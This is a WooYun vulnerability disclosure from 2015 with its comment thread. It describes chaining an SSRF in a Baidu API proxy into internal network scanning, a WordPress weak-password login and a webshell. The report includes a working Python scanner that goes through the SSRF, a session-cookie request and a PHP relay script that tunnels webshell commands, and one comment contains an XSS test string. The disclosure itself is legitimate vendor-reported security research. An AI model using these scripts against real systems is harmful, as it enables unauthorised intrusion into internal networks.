当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099070

漏洞标题:百度某个从SSRF到内网WebShell

相关厂商:百度

漏洞作者: Jannock

提交时间:2015-03-02 15:56

修复时间:2015-04-16 15:58

公开时间:2015-04-16 15:58

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-02: 细节已通知厂商并且等待厂商处理中
2015-03-02: 厂商已经确认,细节仅向厂商公开
2015-03-12: 细节向核心白帽子及相关领域专家公开
2015-03-22: 细节向普通白帽子公开
2015-04-01: 细节向实习白帽子公开
2015-04-16: 细节向公众公开

简要描述:

所有故事从一个简单的SSRF说起。。。

详细说明:

1、某次发现一个SSRF
http://apistore.baidu.com/astore/toolshttpproxy

1.png


功能十分全,包括get post 什么的。
2、内网探测
首先从dns爆破中获取部分内网ip,然后写个脚本探测
探测脚本 

#encoding=utf-8
import httplib
import time
import string
import sys
import random
import json
import traceback
import urllib
 
reload(sys)  
sys.setdefaultencoding('utf8')  
headers = {'cookie':'自己加上','Content-Type':'application/x-www-form-urlencoded; charset=UTF-8','X-Requested-With':'XMLHttpRequest','User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0'}
for i in range(1, 255):
    try:
        print i
        s = "172.22.1.%s" % (i)
        conn = httplib.HTTPConnection('apistore.baidu.com')
        conn.request(method='POST',
                     url="/astore/toolshttpproxysend",
                     body='reqMethod=GET&reqUrl=http%3A%2F%2F' + s +'&token=token',
                     headers=headers)
        msg = conn.getresponse().read()
        msg = json.loads(msg)
        if msg["retMsg"] == "success":
           print s
           f = open('rrrr.txt','ab+')
           f.write(s + '\r\n')
           f.write( urllib.unquote(msg["retData"]["responseHeader"]).replace('<br/>','\r\n') + '\r\n')
           f.write( urllib.unquote(msg["retData"]["responseBody"]).replace('<br/>','\r\n') + '\r\n\r\n')
           f.close()
        conn.close()
    except:
        print traceback.format_exc()
        pass


探测结果:

3.png


4.png


其中有个 wordpress 程序引起我注意
http://172.22.1.19 (cdm.baidu.com)
3、wordpress 弱口令探测

5.png


弱口令结果还是比较多
wanglu admin
拿了一个测试下
先登陆 POST,再根据获取回来的cookie,加入到请求头中。
http://apistore.baidu.com/astore/toolshttpproxysend?
reqMethod=POST&reqUrl=http://172.22.1.19/wp-admin/&token=ae6e554399dd045278f4128312f13853&&reqHeaders[0][key]=Cookie&reqHeaders[0][value]=wc_session_cookie_534fc29aac95152772c55e78ddffb136=8fpvzWnjz76BNkvv4GJMrx1gvfVihDFS%7C%7C1425449844%7C%7C1425446244%7C%7C4bcc9f20e60d5905d3aaf9eda0c5fe28;woocommerce_items_in_cart=0;woocommerce_cart_hash=0;wordpress_test_cookie=WP+Cookie+check;wordpress_534fc29aac95152772c55e78ddffb136=wanglu%7C1425449844%7Cba1f72d7cd9660584197a34afaf1caf8;wordpress_534fc29aac95152772c55e78ddffb136=wanglu%7C1425449844%7Cba1f72d7cd9660584197a34afaf1caf8;wordpress_logged_in_534fc29aac95152772c55e78ddffb136=wanglu%7C1425449844%7C04c26a78d42c83cb884f52071d5c28c8;
成功查询到后台登陆成功后的 html。
后面就是简单的wordpress 拿shell,写模板。
这个过程比较麻烦,不过折腾下就可以成功。
4、连接webshell
为了方便操作,本地写了一个php的转发代理

<?php 
$webshell="http://apistore.baidu.com/astore/toolshttpproxysend";
$data['reqMethod']='POST';
$data['reqUrl']='http://172.22.1.19/wp-content/themes/salient-new/404.php';
$data['token']='ae6e554399dd045278f4128312f13853';
$i = 0;
foreach($_POST as $key => $value)
{
 $data["reqBodyParams[$i][key]"]=$key;
 $data["reqBodyParams[$i][value]"]= urlencode( $value );
 $i++;
}
$data = http_build_query($data);   
$opts = array (   
'http' => array (   
'method' => 'POST',   
'header'=> "Content-type: application/x-www-form-urlencoded\r\nCookie: cookie\r\nX-Requested-With: XMLHttpRequest\r\nUser-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\r\n" .   
"Content-Length: " . strlen($data) . "\r\n",   
'content' => $data) 
); 
 
$context = stream_context_create($opts);   
$html = @file_get_contents($webshell, false, $context); 
$data = json_decode($html,true);
echo urldecode($data["retData"]["responseBody"]);
?>


过程完成,获取权限。

6.png


漏洞证明:

7.png


8.png

修复方案:

内网也要注意安全

版权声明:转载请注明来源 Jannock@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-03-02 21:23

厂商回复:

感谢提交,已通知业务部门处理

最新状态:

暂无

漏洞评价:

评论

  1. 2015-03-02 15:58 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    刚刚有个人人网ssrf内网sql注入的,一哥来了就ssrf直接shell百度,哈哈

  2. 2015-03-02 16:01 | 大胖子 ( 普通白帽子 | Rank:122 漏洞数:12 )

    好厉害的样子呢

  3. 2015-03-02 16:09 | 孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷,这坑爹的七夕啊 。。。。)

    一哥,请收下我的膝盖

  4. 2015-03-02 16:10 | greg.wu ( 普通白帽子 | Rank:815 漏洞数:99 | 打酱油的~)

    碉堡了

  5. 2015-03-02 16:13 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    这么快就被雷劈了

  6. 2015-03-02 16:15 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    思路真好,看懂了

  7. 2015-03-02 16:16 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀,伊雅伊尔哟。)

    我喜欢看故事 - -

  8. 2015-03-02 16:18 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    本地中转shell

  9. 2015-03-02 16:28 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    请收下我的裤带。

  10. 2015-03-02 16:29 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    思路真好,虽然没看懂

  11. 2015-03-02 16:29 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    厉害。

  12. 2015-03-02 16:30 | Mr .LZH ( 普通白帽子 | Rank:583 漏洞数:75 | 非妹子勿扰···)

    牛逼

  13. 2015-03-02 16:32 | Taro ( 普通白帽子 | Rank:178 漏洞数:48 | 走向最远的方向,哪怕前路迷茫;抱着最大的...)

    都是大神啊,求包养

  14. 2015-03-02 16:38 | 盛大网络(乌云厂商)

    一哥 多关注关注我 @Jannock

  15. 2015-03-02 16:39 | 中兴通讯股份有限公司(乌云厂商)

    一哥 多关注关注我 @Jannock

  16. 2015-03-02 16:40 | Vinc ( 普通白帽子 | Rank:120 漏洞数:22 | :))

    mark下

  17. 2015-03-02 16:41 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @中兴通讯股份有限公司 @盛大网络 — —。能严肃一点么。。。。 瞄...

  18. 2015-03-02 16:42 | 途牛旅游网(乌云厂商)

    一哥 多关注关注我 @Jannock

  19. 2015-03-02 16:43 | 7天连锁酒店(乌云厂商)

    一哥 有空也可以关注一下我们小公司,么么哒。

  20. 2015-03-02 16:46 | 快钱(乌云厂商)

    一哥 多关注关注我 么么哒 @Jannock

  21. 2015-03-02 16:48 | Stardustsky ( 路人 | Rank:4 漏洞数:3 | ……)

    楼上公司红灯区小姐拉客即视感……

  22. 2015-03-02 16:49 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    一哥拿个小本本,一个个的记上了!哼

  23. 2015-03-02 16:56 | bey0nd ( 普通白帽子 | Rank:895 漏洞数:142 | 相忘于江湖,不如相濡以沫)

    厂商回复亮了

  24. 2015-03-02 16:59 | Mr .LZH ( 普通白帽子 | Rank:583 漏洞数:75 | 非妹子勿扰···)

    楼上一大堆厂商求草,一个你射死他们

  25. 2015-03-02 17:03 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    一哥把楼上一个个都先入库!

  26. 2015-03-02 17:06 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    @快钱 @7天连锁酒店 @途牛旅游网 @中兴通讯股份有限公司 @盛大网络 厂商是要脑那样

  27. 2015-03-02 17:07 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  28. 2015-03-02 17:09 | 黑吃黑 ( 普通白帽子 | Rank:139 漏洞数:29 | 倚楼听风雨,淡看江湖路...)

    这个和我以前的思路一模一样。

  29. 2015-03-02 17:14 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    屌屌的

  30. 2015-03-02 17:15 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    看来厂商求草啊 一哥能不能满足他们呢?

  31. 2015-03-02 17:19 | 红客十年 ( 普通白帽子 | Rank:334 漏洞数:63 | 去年离职富士康,回到家中上蓝翔,蓝翔毕业...)

    一哥,我是来看厂商的

  32. 2015-03-02 17:19 | char ( 路人 | Rank:13 漏洞数:3 | 中国平安,不只保险这么简单。)

    一群调皮的厂商。 @盛大网络 把大家都带坏了。

  33. 2015-03-02 17:33 | 苏州同程旅游网络科技有限公司(乌云厂商)

    来迟了 一哥 多关照关照小弟 @Jannock

  34. 2015-03-02 17:56 | f4ckbaidu ( 普通白帽子 | Rank:182 漏洞数:23 | 开发真是日了狗了)

    厂商集体卖萌。。。

  35. 2015-03-02 18:06 | 第四维度 ( 实习白帽子 | Rank:58 漏洞数:34 | 谦谦君子,温润如玉)

    围观

  36. 2015-03-02 18:07 | 岩少 ( 普通白帽子 | Rank:586 漏洞数:171 | 破晓团队)

    @7天连锁酒店 正好到北京七天连锁住呢。。

  37. 2015-03-02 18:15 | Catsay ( 实习白帽子 | Rank:85 漏洞数:16 | 屌丝一枚)

    叼...围观

  38. 2015-03-02 18:39 | 大亮 ( 普通白帽子 | Rank:306 漏洞数:65 | 慢慢挖洞)

    百度2015真是好开端啊

  39. 2015-03-02 19:01 | Taro ( 普通白帽子 | Rank:178 漏洞数:48 | 走向最远的方向,哪怕前路迷茫;抱着最大的...)

    话说2015刚开始,百度中枪多少次了啊

  40. 2015-03-02 19:11 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)

    恩,思路很好

  41. 2015-03-02 19:19 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    准备看看公开

  42. 2015-03-02 19:43 | 虾米 ( 普通白帽子 | Rank:105 漏洞数:13 )

    来看厂商

  43. 2015-03-02 19:54 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    求包养~

  44. 2015-03-02 20:24 | cold ( 路人 | Rank:2 漏洞数:2 | 生命不息,折腾不止。)

    彦宏说过技术改变世界,百度改变技术。。

  45. 2015-03-02 20:56 | 蜉蝣 ( 实习白帽子 | Rank:93 漏洞数:24 )

    一哥快祭出大凶器,楼上的厂商一个都不放过,

  46. 2015-03-02 21:04 | Catsay ( 实习白帽子 | Rank:85 漏洞数:16 | 屌丝一枚)

    厂商都来卖萌么

  47. 2015-03-02 21:27 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1:5 无限量收 [平台担保]))

    这个必须关注。

  48. 2015-03-02 21:44 | 狂人 ( 实习白帽子 | Rank:88 漏洞数:13 | Rank:999999999 漏洞数:999999999 | 小学生...)

    我擦 百度主站?

  49. 2015-03-02 21:47 | bcwr ( 路人 | Rank:15 漏洞数:1 | 努力挖洞)

    牛X,学习中

  50. 2015-03-02 21:59 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    一哥,缺搞基的么???特么我要是女生我就跟定你了。

  51. 2015-03-03 09:26 | 陆由乙 ( 普通白帽子 | Rank:119 漏洞数:38 | 呵呵!)

  52. 2015-03-03 12:08 | Mik3y_14 ( 普通白帽子 | Rank:181 漏洞数:29 | 愿君多采撷,此物最相思。)

    厉害。

  53. 2015-03-09 22:17 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    。。。。。。

  54. 2015-03-23 09:10 | 白开水 ( 普通白帽子 | Rank:242 漏洞数:27 | 苍茫的天涯是我的爱~)

    提醒:级别足够但是无法查看 Rank 高于自己的白帽子漏洞 ( 可以等待进一步公开或者支付 9 个乌云币提前查看 )

  55. 2015-04-01 22:48 | Ztz ( 普通白帽子 | Rank:152 漏洞数:40 | 自由职业)

    牛牛牛!

  56. 2015-04-02 08:12 | qhwlpg ( 普通白帽子 | Rank:226 漏洞数:54 | 潜心代码审计。)

    屌屌屌!

  57. 2015-04-02 16:30 | qiaoy ( 普通白帽子 | Rank:110 漏洞数:16 )

    典型案例

  58. 2015-04-04 23:50 | Mr .LZH ( 普通白帽子 | Rank:583 漏洞数:75 | 非妹子勿扰···)

    我去,我开始以为是用struct2命令执行拿shell的,没想到直接搞WordPress,膜拜

  59. 2015-04-10 00:26 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    找到一个点;想到一个好的想法 然后实现了。 Good这才是真正的安全研究者

  60. 2015-04-13 14:57 | sql小神 ( 路人 | Rank:19 漏洞数:4 | 有些漏洞可以提,有些漏洞不可以提。)

    xxxxxxxxx

  61. 2015-04-13 15:19 | 海绵宝宝 ( 普通白帽子 | Rank:243 漏洞数:50 | 唯有梦想与好姑娘不可辜负.)

    nice

  62. 2015-04-15 13:02 | 温柔的逍遥 ( 路人 | Rank:10 漏洞数:1 | 温柔的逍遥)

    z学习了

  63. 2015-04-16 17:36 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    =。=一哥这么赤果果用菜刀链接,公然挑战百度的入侵检测嘛。

  64. 2015-04-16 19:56 | Mr.R ( 实习白帽子 | Rank:52 漏洞数:14 | 求大神带我飞 qq2584110147)

    一哥快上 楼上厂商求撸

  65. 2015-04-16 20:42 | Mark ( 路人 | Rank:8 漏洞数:2 | 渗透你的心)

    一哥,请收下我的膝盖

  66. 2015-04-16 20:47 | 屠龙宝刀点击就送 ( 路人 | Rank:4 漏洞数:2 | 简要介绍不能为空)

    一哥快满足楼上的厂商们

  67. 2015-04-17 10:10 | noob ( 实习白帽子 | Rank:81 漏洞数:18 | 向各位大神学习,向各位大神致敬)

    产商集体卖萌了。。

  68. 2015-04-30 09:57 | BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效,坚持好的习惯千万不要放弃)

    吊炸天

  69. 2015-06-05 14:05 | 小夜 ( 路人 | Rank:15 漏洞数:8 | 漫长的日子)

    受益匪浅 叼

  70. 2015-06-08 09:28 | 途牛旅游网(乌云厂商)

    一哥 多关注关注我 @Jannock 么么哒

  71. 2015-06-23 01:51 | IOT ( 实习白帽子 | Rank:31 漏洞数:3 | 不知道什么时候才有很多人知道我呢)

    mark下,楼上厂商有一天一个也跑不掉

  72. 2015-06-28 13:52 | 0x12 ( 路人 | Rank:4 漏洞数:2 | <script>alert(/0x12/)</script>)

    .